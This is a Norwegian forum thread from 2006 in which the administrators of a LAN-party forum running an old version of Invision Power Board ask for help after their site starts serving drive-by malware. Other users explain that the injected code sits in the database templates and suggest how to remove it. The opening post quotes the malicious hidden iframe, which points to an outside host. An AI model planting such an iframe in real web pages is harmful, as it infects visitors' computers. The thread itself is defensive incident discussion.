Barry White Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 Lenken fører til ein webområde der pc'en utan virusbeskyttelse kan bli infisert På http://forum.meldal-lan.com/ har det idag dukket opp et virus av typen Download.Trojan Når jeg i webleseren velger "Vis kilde" så får jeg opp følgende kodesnutt før head-taggen: <iframe src="http://2-extreme.biz/traff.php?adv=53" width="1" height="1" style="position: absolute; top: -222px; left: -222px; visibility: hidden"></iframe> Men i index.php-fila er det ikke noen slik kode. Forumet vi kjører har gammel software, Invision Power Board v1.3, så en løsning er selvfølgelig å oppgradere til nyere versjon. Men finnes det noen midlertidig løsning på dette? Og for å bli litt klokere, er det noen som kan forklare meg hvordan denne koden kan snike seg inn når jeg ikke finner den igjen i noen filer i mappa www.meldal-lan.com/forum ? I tillegg til viruset så kommer også IE 6 (XP SP2) med advarsel om både blokkering av pop-up og av ActiveX-kontroller. ActiveX-kontrolleren forsøker å installere ErrorSafe (www.errorsafe.com). Edit: Også WinFixer forsøkes installert. Setter STOR pris på hjelp vedrørende dette! Dersom innlegget mitt er postet i feil delforum så beklager jeg dette. Lenke til kommentar
nree Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 (endret) Ikke gå inn på siden vist du ikke har skikkelig virusprogram :S Jeg surfa litt rundt på forumet og plutselig (etter jeg hadde trykket 2 steder) fikk jeg dritten på PCen.. Begynte å laste ned (eller, prøvde vertfall) en WMF film og i tillegg ble et javascript blokkert. Hmm.. Har ikke screenshot av javascriptet men fikk tatt et screenshot akkuratt i det advarsler og nedlastning startet!! Du bør stenge forumet med en gang før noen uten antivirus går inn.. Rename subdomenet elns. Endret 12. mai 2006 av goggen90 Lenke til kommentar
-A-nders Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 (endret) . Endret 25. januar 2018 av -A-nders Lenke til kommentar
Surfern Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 Vi hadde ikke til hensikt å skape problemer for andre folk med denne tråden! Det går vel tydelig frem av innlegget at det her er snakk om virus? Så jeg håper de uten skikkelig beskyttelse ikke surfer innom der. Men hyggelig at dere bruker av fritiden til å surfe på vårt forum! Bare så det er nevnt, "Off topic"-kategorien, og spesielt underforumet "Søppel" er en ren SPAMe-kategori. Dessverre litt lite seriøs bruk av det forumet. Men om noen har noen gode tips til hva vi skal gjøre så mottas de med takk! Det hjelper ikke å stenge forumet i Admin kontrollpanel, den iframe-koden blir liggende der likevel, så vi må nok rename undermappa www.meldal-lan.com/forum/ e.l. Uansett om en har god beskyttelse så popper det opp virusadvarsler og ErrorSafe / WinFixer-meldinger i hytt og pine der. Så en index.html med advarsel før en går inn på index2.php er i grunn lite vits i. For ordens skyld, både jeg (Ein00b på meldal-lan) og Foilltank (Terje på meldal-lan) er administrator på det forumet, denne tråden ble startet hos han. Lenke til kommentar
chairgame Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 synd hvis det forumet (som jeg forumerer på daglig ) blir steng eller "omstartet" Lenke til kommentar
mikk- Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 Enkleste er kanskje å ta backup av databasen og kjøre det opp på nytt igjen? Tar vel ikke så lang tid.. Lenke til kommentar
Surfern Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 (endret) Hvor ligger den iframe-koden da tro? Siden vi ikke finner den i noen fil i forum-mappa så er det litt fortvilt. Og vil ikke en eventuell backup ta med seg den koden? Å endre navnet på forum-mappa hjalp ihvertfall ikke, den iframe-koden fant index.php likevel. Jeg har ikke peiling på grunnoppsett av slike forum, eller databasene bak. Den andre admin kan litt mer, men han som i sin tid satte det opp fra bunnen av er dessverre ikke lenger blant oss. Endret 12. mai 2006 av GranTurismo Lenke til kommentar
mikk- Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 (endret) En backup vil vel ikke ta med seg koden, så lenge det bare er en backup av databasen (medlemmene, innlegg, pm-er, etc). Skjønner ikke helt hvorfor dere ikke finner den i forum mappa, om dere søker gjennom hele. Prøv å søke på fragmenter av den. Kan hende den er "kryptert" på noen måte eller at man bare finner referanser til den (at selve koden hentes fra et annet sted når man laster siden), etc. edit: Endret 12. mai 2006 av Mikael Berg Lenke til kommentar
Surfern Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 Vi kopierte hele mappa via ftp til lokal disk, og søkte etter filer som inneholdt teksten "biz" (toppdomenet til serveren som blir kalt opp i iframe), uten treff. For de som tør å besøke forumet, dvs. de som er virusbeskyttet, så er det et eget delforum i bunnen som er dedikert hilsninger vårt tidligere crew-medlem Audun. R-I-P Lenke til kommentar
jorgis Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 IPB henter alle sine HTML-biter fra databasen, i en tabell som heter template, eller noe lignende. Sjekk i template-tabellen i databasen, og se om du finner en template som kontrollerer designet for forsiden (forum wrapper eller lignende). Det skal gå an å fjerne det derfra. En databasebackup med medfølgende reinstall vil IKKE fikse problemet. En annen ting; dette betyr at noen har hatt tilgang (i hvert fall skrivetilgang) til databasen, hvilket betyr at han/hun kan ha hentet ut komplette medlemslister med brukernavn, epost og (lettere krypterte) passord. Hør med webhosten din om hva som har skjedd, og krev at de sikrer serverne sine bedre etter dette. Det er totalt uakseptabelt at noe slikt skal kunne skje. Lenke til kommentar
Dahl Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 (endret) En annen ting; dette betyr at noen har hatt tilgang (i hvert fall skrivetilgang) til databasen, hvilket betyr at han/hun kan ha hentet ut komplette medlemslister med brukernavn, epost og (lettere krypterte) passord. Hør med webhosten din om hva som har skjedd, og krev at de sikrer serverne sine bedre etter dette. Det er totalt uakseptabelt at noe slikt skal kunne skje. 6091491[/snapback] Stemmer, men vi kan ikke være sikre på at tilgangen ikke er gjort mulig av en sårbarhet i IPB-programvaren. Det beste er nok å ta backup av databasen, og fjerne alle filer på serveren. Deretter installerer dere nyeste versjon av IPB, og legger inn backupen dere har av databasen. Endret 12. mai 2006 av Dahl Lenke til kommentar
jorgis Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 En annen ting; dette betyr at noen har hatt tilgang (i hvert fall skrivetilgang) til databasen, hvilket betyr at han/hun kan ha hentet ut komplette medlemslister med brukernavn, epost og (lettere krypterte) passord. Hør med webhosten din om hva som har skjedd, og krev at de sikrer serverne sine bedre etter dette. Det er totalt uakseptabelt at noe slikt skal kunne skje. 6091491[/snapback] Stemmer, men vi kan ikke være sikre på at tilgangen ikke er gjort mulig av en sårbarhet i IPB-programvaren. Det beste er nok å ta backup av databasen, og fjerne alle filer på serveren. Deretter installerer dere nyeste versjon av IPB, og legger inn backupen dere har av databasen. 6091514[/snapback] Det vil ikke gå, av mange grunner: 1. Databasestrukturen til IPB 1.3.x er helt forskjellig fra 2.1.x, som er nyeste. 2.1.x koster også en god del penger. 2. Den ondsinnete iframen ligger i databasen, så en backup vil bare føre exploiten med seg. Det enkleste er å enkelt og greit gå inn i databasen, finne templaten hvor exploiten er plassert, og bare luk den enkelt og greit ut (bruk phpmyadmin eller lignende). Hør med webhost hva som egentlig skjedde for å være sikker på at det ikke er IPB som har skylden for innbruddet. Hvis det er tilfellet, kan det være lurt å gå over til et annet (gratis) alternativ, som f.eks. phpBB eller SMF. Lenke til kommentar
Surfern Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 (endret) Takk for tips jorgis! Vi får se på dette i løpet av helga. Jeg ser at vi ikke uten videre kan oppgradere til IPB 2.1.*, og særlig minneforumet til Audun er det ønskelig å ta vare på! Resten er det ikke SÅ farlig med. Hva med andre teknologier, er det mulig å ta med seg eksisterende databasen inn i de? Det kan selvsagt i teorien være noen som har snappet opp enten mitt eller Foilltank sitt passord også. Men vi vil høre med webhost også om det kan være hos de det har skjedd. Endret 12. mai 2006 av GranTurismo Lenke til kommentar
jorgis Skrevet 12. mai 2006 Del Skrevet 12. mai 2006 Siden IPB 1.3 er såpass gammel som den er, vil jeg tro at de bare har brukt en ferdig exploit for IPB. IPS nekter også å slippe oppdateringer til IPB 1.3, så dere er ganske usikret når dere kjører en så gammel versjon. Det er mest sannsynlig at du bare er utsatt for en scriptkiddie som har funnet en SQL insertion exploit på nettet et sted, og brukt den til å spre noe dritt. Bør kunne fjernes på få minutter, dog. Lenke til kommentar
Barry White Skrevet 13. mai 2006 Forfatter Del Skrevet 13. mai 2006 takk for gode svar! Jeg gjorde en stor tabbe i går...jeg ga ut banen til htpwd (elsn) på mirc, altså den filen passordene til hjemmesida vår ligger i, passordene (som er kryptert) gir tilgang til ftp passord, mysql passord osv. ligger på adminpanelet vårt. Jeg prøvde selv etterpå å taste inn banen i nettlseren min, men da sto det "no accsess" - mulig en forbanna fjortis har greid det da men... Det jeg synes er rart er at om en har funnet ut passordene våre, så går han på databasen til forumet vårt og legger inn malware. Rart at ikke vedkommende hadde gjort værre liksom. Men den "SQL insertion exploit" som jorgis snakket om, kan den settes inn uten at du vet pwd? Takker igjen for alle tips, og alle tips vi får videre! Forumet er viktig for oss, spesielt det forumet som omhandler Audun, et tidligere crew medlem som gikk bort... Lenke til kommentar
Arne Skrevet 13. mai 2006 Del Skrevet 13. mai 2006 SqL Insertions kan vel bl. anna brukas til å få passordet (lure seg inn utan passord). Trur du ikkje den som hadde klart å få seg inn på din konto ville endra passord med ein gong? Lenke til kommentar
Barry White Skrevet 13. mai 2006 Forfatter Del Skrevet 13. mai 2006 (endret) jo, det virker rart om han ikke hadde gjort det. nå - hvordan kommer vi oss inn i databasen? Husker jeg har gjort det en gang før, da trengte jeg et slags program. er vel mysql det heter? Detta kan jeg ingenting om, om jeg ikke får det til så får jeg få hjelp av noen.. Men om noen kan gi meg noen tjappe guidetips har det vært fint.. Endret 8. februar 2011 av Barry White Lenke til kommentar
Arne Skrevet 13. mai 2006 Del Skrevet 13. mai 2006 Du kan prøve med PhpMyAdmin, viss du har det. Lenke til kommentar
kjetil_b Skrevet 13. mai 2006 Del Skrevet 13. mai 2006 Dere har vel cpanel? Da går dere bare inn på Mysql og link til phpmyadmin finnes nederst på den sida. Gå inn der og evt. eksporter databasen. Ble faktisk litt nervøs jeg også nå, siden jeg er registrert på forumet også... Håper dere får fikset dette. Lenke til kommentar
Barry White Skrevet 13. mai 2006 Forfatter Del Skrevet 13. mai 2006 (endret) Jeg ser en "MySQL Export" når jeg logger meg inn på phpadmin ja... Og jeg ser en meny med masse rart, eks. ippbe_search_results Hvor skal jeg gå for å få bukt med dette mon tro? Ettersom jeg har forstått at ipb 1.3 er svakt vil vi vel oppdatere forumet vårt etter dette. Men å få tatt backup av forummelding og legge det inn i et nytt forum har jeg forstått er et problem. Noen som har tips angående dette? Endret 8. februar 2011 av Barry White Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå